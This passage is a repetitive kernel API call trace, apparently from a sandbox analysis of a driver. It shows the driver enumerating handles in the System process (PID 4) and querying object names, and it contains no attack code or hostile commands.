HandleInformation=0x0) returned 0xc0000008 [0258.117] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.117] PsReleaseProcessExitSynchronization () returned 0x2 [0258.117] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f0 [0258.117] IoCompleteRequest () returned 0x0 [0258.117] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.117] PsAcquireProcessExitSynchronization () returned 0x0 [0258.117] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.117] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.117] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.117] PsReleaseProcessExitSynchronization () returned 0x2 [0258.117] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ef [0258.117] IoCompleteRequest () returned 0x0 [0258.117] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.117] PsAcquireProcessExitSynchronization () returned 0x0 [0258.117] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.117] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ba8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a722070, HandleInformation=0x0) returned 0x0 [0258.117] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.117] PsReleaseProcessExitSynchronization () returned 0x2 [0258.117] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ee [0258.117] ObQueryNameString (in: Object=0xffffe0006a722070, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.117] ObfDereferenceObject (Object=0xffffe0006a722070) returned 0x8000 [0258.117] IoCompleteRequest () returned 0x0 [0258.117] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.117] PsAcquireProcessExitSynchronization () returned 0x0 [0258.117] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.118] ObReferenceObjectByHandle (in: Handle=0xffffffff80000bc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.118] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.118] PsReleaseProcessExitSynchronization () returned 0x2 [0258.118] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ed [0258.118] IoCompleteRequest () returned 0x0 [0258.118] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.118] PsAcquireProcessExitSynchronization () returned 0x0 [0258.118] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.118] ObReferenceObjectByHandle (in: Handle=0xffffffff80000bdc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.118] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.118] PsReleaseProcessExitSynchronization () returned 0x2 [0258.118] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ec [0258.118] IoCompleteRequest () returned 0x0 [0258.118] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.118] PsAcquireProcessExitSynchronization () returned 0x0 [0258.118] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.118] ObReferenceObjectByHandle (in: Handle=0xffffffff80000be4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069208850, HandleInformation=0x0) returned 0x0 [0258.118] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.118] PsReleaseProcessExitSynchronization () returned 0x2 [0258.118] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9eb [0258.118] ObQueryNameString (in: Object=0xffffe00069208850, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.118] ObfDereferenceObject (Object=0xffffe00069208850) returned 0x8000 [0258.118] IoCompleteRequest () returned 0x0 [0258.118] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.118] PsAcquireProcessExitSynchronization () returned 0x0 [0258.118] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.118] ObReferenceObjectByHandle (in: Handle=0xffffffff80000be8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069159560, HandleInformation=0x0) returned 0x0 [0258.118] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.118] PsReleaseProcessExitSynchronization () returned 0x2 [0258.118] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ea [0258.118] ObQueryNameString (in: Object=0xffffe00069159560, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.118] ObfDereferenceObject (Object=0xffffe00069159560) returned 0x8000 [0258.118] IoCompleteRequest () returned 0x0 [0258.118] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.118] PsAcquireProcessExitSynchronization () returned 0x0 [0258.118] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.118] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.118] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.119] PsReleaseProcessExitSynchronization () returned 0x2 [0258.119] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e9 [0258.119] IoCompleteRequest () returned 0x0 [0258.119] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.119] PsAcquireProcessExitSynchronization () returned 0x0 [0258.119] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.119] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.119] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.119] PsReleaseProcessExitSynchronization () returned 0x2 [0258.119] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e8 [0258.119] IoCompleteRequest () returned 0x0 [0258.119] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.119] PsAcquireProcessExitSynchronization () returned 0x0 [0258.119] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.119] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.119] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.119] PsReleaseProcessExitSynchronization () returned 0x2 [0258.119] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e7 [0258.119] IoCompleteRequest () returned 0x0 [0258.119] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.119] PsAcquireProcessExitSynchronization () returned 0x0 [0258.119] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.119] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.119] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.119] PsReleaseProcessExitSynchronization () returned 0x2 [0258.119] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e6 [0258.119] IoCompleteRequest () returned 0x0 [0258.119] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.119] PsAcquireProcessExitSynchronization () returned 0x0 [0258.119] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.119] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.119] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.119] PsReleaseProcessExitSynchronization () returned 0x2 [0258.119] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e5 [0258.119] IoCompleteRequest () returned 0x0 [0258.119] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.119] PsAcquireProcessExitSynchronization () returned 0x0 [0258.120] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.120] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c60, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.120] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.120] PsReleaseProcessExitSynchronization () returned 0x2 [0258.120] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e4 [0258.120] IoCompleteRequest () returned 0x0 [0258.120] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.120] PsAcquireProcessExitSynchronization () returned 0x0 [0258.120] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.120] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069167560, HandleInformation=0x0) returned 0x0 [0258.120] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.120] PsReleaseProcessExitSynchronization () returned 0x2 [0258.120] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e3 [0258.120] ObQueryNameString (in: Object=0xffffe00069167560, ObjectNameInfo=0xffffe0006a9af044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a9af044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.120] ObfDereferenceObject (Object=0xffffe00069167560) returned 0x8000 [0258.120] IoCompleteRequest () returned 0x0 [0258.120] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.120] PsAcquireProcessExitSynchronization () returned 0x0 [0258.120] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.120] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069153790, HandleInformation=0x0) returned 0x0 [0258.120] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.120] PsReleaseProcessExitSynchronization () returned 0x2 [0258.120] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e2 [0258.120] ObQueryNameString (in: Object=0xffffe00069153790, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.120] ObfDereferenceObject (Object=0xffffe00069153790) returned 0x8000 [0258.120] IoCompleteRequest () returned 0x0 [0258.120] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.120] PsAcquireProcessExitSynchronization () returned 0x0 [0258.120] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.120] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a0bf950, HandleInformation=0x0) returned 0x0 [0258.120] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.120] PsReleaseProcessExitSynchronization () returned 0x2 [0258.120] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e1 [0258.120] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.120] ObfDereferenceObject (Object=0xffffe0006a0bf950) returned 0x7f43 [0258.120] IoCompleteRequest () returned 0x0 [0258.121] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.121] PsAcquireProcessExitSynchronization () returned 0x0 [0258.121] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.121] ObReferenceObjectByHandle (in: Handle=0xffffffff80000c98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691b7630, HandleInformation=0x0) returned 0x0 [0258.121] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.121] PsReleaseProcessExitSynchronization () returned 0x2 [0258.121] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e0 [0258.967] ObQueryNameString (in: Object=0xffffe000691b7630, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.967] ObfDereferenceObject (Object=0xffffe000691b7630) returned 0x8000 [0258.967] IoCompleteRequest () returned 0x0 [0258.967] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.967] PsAcquireProcessExitSynchronization () returned 0x0 [0258.967] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.967] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ca4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a5612f0, HandleInformation=0x0) returned 0x0 [0258.967] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.967] PsReleaseProcessExitSynchronization () returned 0x2 [0258.967] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9e0 [0258.967] ObQueryNameString (in: Object=0xffffe0006a5612f0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.967] ObfDereferenceObject (Object=0xffffe0006a5612f0) returned 0x8000 [0258.967] IoCompleteRequest () returned 0x0 [0258.967] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.967] PsAcquireProcessExitSynchronization () returned 0x0 [0258.967] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.967] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ca8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.967] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.967] PsReleaseProcessExitSynchronization () returned 0x2 [0258.968] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9df [0258.968] IoCompleteRequest () returned 0x0 [0258.968] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.968] PsAcquireProcessExitSynchronization () returned 0x0 [0258.968] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.968] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069352ae0, HandleInformation=0x0) returned 0x0 [0258.968] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.968] PsReleaseProcessExitSynchronization () returned 0x2 [0258.968] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9de [0258.968] ObQueryNameString (in: Object=0xffffe00069352ae0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.968] ObfDereferenceObject (Object=0xffffe00069352ae0) returned 0x8000 [0258.968] IoCompleteRequest () returned 0x0 [0258.968] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.968] PsAcquireProcessExitSynchronization () returned 0x0 [0258.968] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.968] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.968] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.968] PsReleaseProcessExitSynchronization () returned 0x2 [0258.968] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9dd [0258.968] IoCompleteRequest () returned 0x0 [0258.968] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.968] PsAcquireProcessExitSynchronization () returned 0x0 [0258.968] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.968] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.968] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.968] PsReleaseProcessExitSynchronization () returned 0x2 [0258.968] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9dc [0258.968] IoCompleteRequest () returned 0x0 [0258.968] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.968] PsAcquireProcessExitSynchronization () returned 0x0 [0258.968] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.968] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.968] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.968] PsReleaseProcessExitSynchronization () returned 0x2 [0258.968] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9db [0258.968] IoCompleteRequest () returned 0x0 [0258.968] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.968] PsAcquireProcessExitSynchronization () returned 0x0 [0258.968] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.968] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691143c0, HandleInformation=0x0) returned 0x0 [0258.968] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.968] PsReleaseProcessExitSynchronization () returned 0x2 [0258.968] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9da [0258.968] ObQueryNameString (in: Object=0xffffe000691143c0, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.968] ObfDereferenceObject (Object=0xffffe000691143c0) returned 0x8000 [0258.969] IoCompleteRequest () returned 0x0 [0258.969] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.969] PsAcquireProcessExitSynchronization () returned 0x0 [0258.969] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.969] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ccc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a32c3e0, HandleInformation=0x0) returned 0x0 [0258.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.969] PsReleaseProcessExitSynchronization () returned 0x2 [0258.969] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d9 [0258.969] ObQueryNameString (in: Object=0xffffe0006a32c3e0, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.969] ObfDereferenceObject (Object=0xffffe0006a32c3e0) returned 0x8000 [0258.969] IoCompleteRequest () returned 0x0 [0258.969] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.969] PsAcquireProcessExitSynchronization () returned 0x0 [0258.969] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.969] ObReferenceObjectByHandle (in: Handle=0xffffffff80000cd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691083c0, HandleInformation=0x0) returned 0x0 [0258.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.969] PsReleaseProcessExitSynchronization () returned 0x2 [0258.969] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d8 [0258.969] ObQueryNameString (in: Object=0xffffe000691083c0, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.969] ObfDereferenceObject (Object=0xffffe000691083c0) returned 0x8000 [0258.969] IoCompleteRequest () returned 0x0 [0258.969] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.969] PsAcquireProcessExitSynchronization () returned 0x0 [0258.969] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.969] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ce4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.969] PsReleaseProcessExitSynchronization () returned 0x2 [0258.969] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d7 [0258.969] IoCompleteRequest () returned 0x0 [0258.969] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.969] PsAcquireProcessExitSynchronization () returned 0x0 [0258.969] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.969] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ce8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069104270, HandleInformation=0x0) returned 0x0 [0258.969] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.969] PsReleaseProcessExitSynchronization () returned 0x2 [0258.969] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9d6 [0258.969] ObQueryNameString (in: Object=0xffffe00069104270, ObjectNameInfo=0xffffe00069041044, Length=0x800, 